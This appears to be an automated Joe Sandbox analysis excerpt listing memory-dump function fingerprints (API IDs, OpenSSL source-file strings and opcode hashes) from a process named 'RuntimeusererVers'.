                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 0-1534007912
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_cust.c
                                                                                                                                                                                                                                          • API String ID: 3962629258-3973221358
                                                                                                                                                                                                                                          • Opcode ID: 39bba86c631204e598ff62e639f37f5f73046ccd44f2d89d291084cdaa1d33ad
                                                                                                                                                                                                                                          • Instruction ID: 6c9b3b4a6cf04ea4cf7d799bbd00066409eb70f97187e14c6a0d02a5adab7b8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39bba86c631204e598ff62e639f37f5f73046ccd44f2d89d291084cdaa1d33ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1416A32A09E4281EE61DF52E8406A963A5FB84BE4F058236EE8C47795EF7CF591C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$D_lock_newO_freeO_zalloc
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_cert.c$B
                                                                                                                                                                                                                                          • API String ID: 3411496311-1824687510
                                                                                                                                                                                                                                          • Opcode ID: 889f6ff03f0a5cde185c8a82e368881b76037717ce5f1044877cf7ef1abf095c
                                                                                                                                                                                                                                          • Instruction ID: 656e80b9b3f05e35fb032f6a426ee4e26a75ed61f33d5bcd61eae91108fcb371
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 889f6ff03f0a5cde185c8a82e368881b76037717ce5f1044877cf7ef1abf095c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39117C71A19A4682EB15DF21D4407E92790FB447A8F844235D94C06392EF7DFA9ACB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_flagsO_freeO_get_dataO_get_initO_get_shutdownO_set_init
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\bio_ssl.c
                                                                                                                                                                                                                                          • API String ID: 3531300166-4039210333
                                                                                                                                                                                                                                          • Opcode ID: b42fafa9bfc7a4b513fe56510db0a8dc245545e9252ab44829cdd493434299b0
                                                                                                                                                                                                                                          • Instruction ID: 60c342d2a683f1f572127563ef29834c2ddf6bdce44c7509a26be9317324afaa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b42fafa9bfc7a4b513fe56510db0a8dc245545e9252ab44829cdd493434299b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67012810F19E4341FE58E6B6A952AB902D1BF867F4F481334FD1E867C6EE1CF4A28200
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E0E255C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 00007FF81E0988C9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: memset.VCRUNTIME140 ref: 00007FF81E0988F7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: memcpy.VCRUNTIME140 ref: 00007FF81E098933
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E098956
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E0989BD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E098A38
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$O_mallocmemcpymemset
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c
                                                                                                                                                                                                                                          • API String ID: 2470733610-348624464
                                                                                                                                                                                                                                          • Opcode ID: 87e23bd9479a19a585572a2706d0a16145bdd5620c84a5ddc2e0aaeba8d5d462
                                                                                                                                                                                                                                          • Instruction ID: ed23506a61f0871078a94def9b628402f9ebc5ab77530d70a66f8c8af8752b3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87e23bd9479a19a585572a2706d0a16145bdd5620c84a5ddc2e0aaeba8d5d462
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD61BB72A09E8289FB648B16E554BB926A1FB84FE4F184231DE4D4BB95DF3CF5418B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$O_malloc
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\t1_lib.c
                                                                                                                                                                                                                                          • API String ID: 1108683871-1643863364
                                                                                                                                                                                                                                          • Opcode ID: a60fca56b0b3966003a55dc8342f5ccc0e6a6bb1fb1fe784f160ef7a5e08ebe3
                                                                                                                                                                                                                                          • Instruction ID: 0d17ff7ddf90c77b35dcaa1a363555436b0b2553fda4373b6b5b4020b7f7ac1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a60fca56b0b3966003a55dc8342f5ccc0e6a6bb1fb1fe784f160ef7a5e08ebe3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F531AC32B18E5386FB20CF61E800AAAA261FB447E4F454635E95E43B85EF7DF6468710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
• Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_reallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1389097454-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 27a81299e4397cce453b4bb35cf925dfa7061ef0ef0b4ee9c43420466c295b87
                                                                                                                                                                                                                                          • Instruction ID: 95f23bbc8730e0f51e385d87eb0f0969f43b51d72d6836d4ff524b2e3e06f051
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27a81299e4397cce453b4bb35cf925dfa7061ef0ef0b4ee9c43420466c295b87
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB31D236A09F8A96EB26CB25E8006B967A4FB457E8F444231EE5C077A0DF3CF556C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free$O_mallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\t1_lib.c
                                                                                                                                                                                                                                          • API String ID: 2563039504-1643863364
                                                                                                                                                                                                                                          • Opcode ID: f48377fe411956e23c2321321ebbe80bd26c650d6c1dc80da4a23891d7b107f2
                                                                                                                                                                                                                                          • Instruction ID: dd737ddf430919602f293f767137afabd1d42fa2fe05767b3458d173a6191362
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f48377fe411956e23c2321321ebbe80bd26c650d6c1dc80da4a23891d7b107f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1319332A0CF5681EB20CB25D510AAAA760FB85BE4F494231EA5C43B99EF7DF651C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_mallocR_put_errormemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 92311482-2868363209
                                                                                                                                                                                                                                          • Opcode ID: b07a6821eb3aac88ff818e32af481811fceebcac28d8e0a41e6ba6b0370d1c36
                                                                                                                                                                                                                                          • Instruction ID: a2c3b6943d7c997f55b80a07fee527db77f0b23d5a2b4cdd5567e27989f23ba4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b07a6821eb3aac88ff818e32af481811fceebcac28d8e0a41e6ba6b0370d1c36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F521493A609A4281FB10CF15E4406A9B3A5FB84BD4F554231DE8C577A9EF39E6928B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free$L_sk_pop_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_conf.c
                                                                                                                                                                                                                                          • API String ID: 1650471521-1527728938
                                                                                                                                                                                                                                          • Opcode ID: 931636c360a65359e9d0292b47e619b5ca8f2a780e46915865d3cef0e9c9ef19
                                                                                                                                                                                                                                          • Instruction ID: 5797a6052d4da6ee188d61010dd548f6a222fec82f9e42f8c36b837a82c3852b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 931636c360a65359e9d0292b47e619b5ca8f2a780e46915865d3cef0e9c9ef19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3301B131B18E4282EE54EB25E440AA867A0FF85BE4F445232FE8D5775ADE2CF646C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_read_lockD_unlockH_retrievememcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2272600717-0
                                                                                                                                                                                                                                          • Opcode ID: acef7fdb32935ee9e8aaafb947195d1895c2ee5faa9f76884614c5a2f208f76e
                                                                                                                                                                                                                                          • Instruction ID: 9fcd617aa09567d652dc28ca292cc834123bd1150f078f6b082f925551a10c2c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acef7fdb32935ee9e8aaafb947195d1895c2ee5faa9f76884614c5a2f208f76e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D318F36B09E8586EEA59B15D4407A973A0FB88BE4F054232EE0E47391DF3DF556CB00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 3962629258-1534007912
                                                                                                                                                                                                                                          • Opcode ID: 407877f993f5957567c7eff96717ca41fb7b45d1e2b29fb543a4a146f498fde5
                                                                                                                                                                                                                                          • Instruction ID: b2f5766f165c1af43a901afe439fe1f7d99c971a6413a2540868aab67eb953c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 407877f993f5957567c7eff96717ca41fb7b45d1e2b29fb543a4a146f498fde5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1416072B19F8185EB518B65E500AB9B3A0FB98BD4F045335EE9D47B56EF3CE1908700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: M_growO_zallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\packet.c
                                                                                                                                                                                                                                          • API String ID: 1461889847-1434567093
                                                                                                                                                                                                                                          • Opcode ID: b9ab6d090586272394edd892f959be5b6ddac8f4c20c47d27eb5d487ae62c8a4
                                                                                                                                                                                                                                          • Instruction ID: 559c9ccf7beca002d6a2fd92d8bceb030460c7e68ff053ab9144eca9ff0d4cbf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9ab6d090586272394edd892f959be5b6ddac8f4c20c47d27eb5d487ae62c8a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9414822A09E4582EF24CF29E550769A3A0FB48BE8F544636DA6D43798DF3CE995C300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_mallocmemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$J
                                                                                                                                                                                                                                          • API String ID: 1834057931-671735911
                                                                                                                                                                                                                                          • Opcode ID: 37713a3698048384b62e0bcc14911b4e64fa5199b032d8d9ccdff18af6216127
                                                                                                                                                                                                                                          • Instruction ID: dddc8f0f23b13fcbaea4458bc57fc8700a7c6f0f9c466f767a1eab834fb1612f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37713a3698048384b62e0bcc14911b4e64fa5199b032d8d9ccdff18af6216127
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF218023A18B8196E610CF26E5006A9B760FB99BD4F459231EF8C57757EF38E2D6C700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$freemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2494952999-0
                                                                                                                                                                                                                                          • Opcode ID: 11ef85e6d1bcdfe93a5dc190668c770f62103d5e628ac0dc4676b0c4619323c5
                                                                                                                                                                                                                                          • Instruction ID: 29e9e84cbf5613abec95af7d92ed6b64907ac43167df28d37c3223ec00f02e85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11ef85e6d1bcdfe93a5dc190668c770f62103d5e628ac0dc4676b0c4619323c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32328E33A05F8186E754CF25D6407A933A4FB58BA8F088739DB5D0B795EF38A1A6C710
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_malloc
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_buffer.c
                                                                                                                                                                                                                                          • API String ID: 2609694610-837614940
                                                                                                                                                                                                                                          • Opcode ID: d16cd4979f713cd8531d89958d8ff67b7e26462fb0fc4025e94a32d601e78317
                                                                                                                                                                                                                                          • Instruction ID: e12542074ec0e0ae8bc0de55f9de1cdcb43309b581691da062b9cfa3793dc58b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d16cd4979f713cd8531d89958d8ff67b7e26462fb0fc4025e94a32d601e78317
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30317E32E09F4182EB608F21E800BA966D1FB44BE4F145634EE8C07B89DF3CE952C744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 5d51552709af5045506332b646aa5221066b11c4749aca41a2fbe489641e8726
                                                                                                                                                                                                                                          • Instruction ID: 194fd8ffedccd4f16c998d7826efaa61fdb9bca397c9766baf95304958011a99
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d51552709af5045506332b646aa5221066b11c4749aca41a2fbe489641e8726
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD21A235B18E9686EB608B20E401BB967A1FB80BD8F584231DE4C07B95DF2EF5928700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c$@
                                                                                                                                                                                                                                          • API String ID: 2011826501-1207107681
                                                                                                                                                                                                                                          • Opcode ID: 85200123b01b05cc52c48a53fd785423268fe6e58dc3e10c0d57c1a64805e6a5
                                                                                                                                                                                                                                          • Instruction ID: 2abc3dc0d10498ea9e7dd7449fed2fb9c05277b43af8318f6a77621714251b12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85200123b01b05cc52c48a53fd785423268fe6e58dc3e10c0d57c1a64805e6a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12212931B08F8285EB508B12D5446A9A7A5FB85FF4F084272DE4D1BB99CF3CF6499314
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_malloc
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_buffer.c$F
                                                                                                                                                                                                                                          • API String ID: 1457121658-4203526889
                                                                                                                                                                                                                                          • Opcode ID: 760e48131aea6df6ca7d3e55eb0f46afc480d02c60cf043e8074869e34ff349e
                                                                                                                                                                                                                                          • Instruction ID: ea42e76e0126e133efd556c5bf52f94938231b258837ab8877de3a3220ae8688
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760e48131aea6df6ca7d3e55eb0f46afc480d02c60cf043e8074869e34ff349e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50118732B18A5181EB509B15F90079967E0F794BD4F044235EF4C57B89DF3DE952CB04
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_strdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_conf.c
                                                                                                                                                                                                                                          • API String ID: 2148955802-1527728938
                                                                                                                                                                                                                                          • Opcode ID: 475cc2bbd808bb89294e481fac7ef19622eb317756c7a8bcef4a154acb9ddcad
                                                                                                                                                                                                                                          • Instruction ID: 1f9f443ffff68e5ead45ab4cd34670cb31556ecd3033c884b94dd2d0924a8e98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 475cc2bbd808bb89294e481fac7ef19622eb317756c7a8bcef4a154acb9ddcad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D11C221B0AB9782EF649755B1806286791FB84BE4F484234EF8E07B59DF2CF4918700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_strdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2148955802-4238427508
                                                                                                                                                                                                                                          • Opcode ID: 4fcc587332fcd85da71337ecb7517b00310b11705aad0983c4cd1313d0b66de5
                                                                                                                                                                                                                                          • Instruction ID: ab164450e502d1d709c4bd1092e320a3fd7759cf97befeeb64c1738d6698ed5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fcc587332fcd85da71337ecb7517b00310b11705aad0983c4cd1313d0b66de5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7411BFA5B0DE5685FF619F45E8507B86751BB81BE4F040235DA8D0BB84CE6DF642CB00
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 3962629258-4238427508
                                                                                                                                                                                                                                          • Opcode ID: 3108a5092fda8c8bee01f408271f6aa1c4df9363ff0874777839b1e8f9030971
                                                                                                                                                                                                                                          • Instruction ID: 0bd71c5d539a0ae8ce81b3a41c2116e448d1096f6b220231fd85ed51c30fa279
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3108a5092fda8c8bee01f408271f6aa1c4df9363ff0874777839b1e8f9030971
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38011E31B19F8291EE999B15E4407E9A294FF48BD0F484131EF5D47B45DF2CE6628700
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 3962629258-2868363209
                                                                                                                                                                                                                                          • Opcode ID: 2dc206ac1897eba174e4d68926f44c31a7b3390a93b44d875a904ad68d885eb1
                                                                                                                                                                                                                                          • Instruction ID: 52e6366b2a9922fae221d70d51860987bfa88e86b042fd0650efd5d684239124
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dc206ac1897eba174e4d68926f44c31a7b3390a93b44d875a904ad68d885eb1
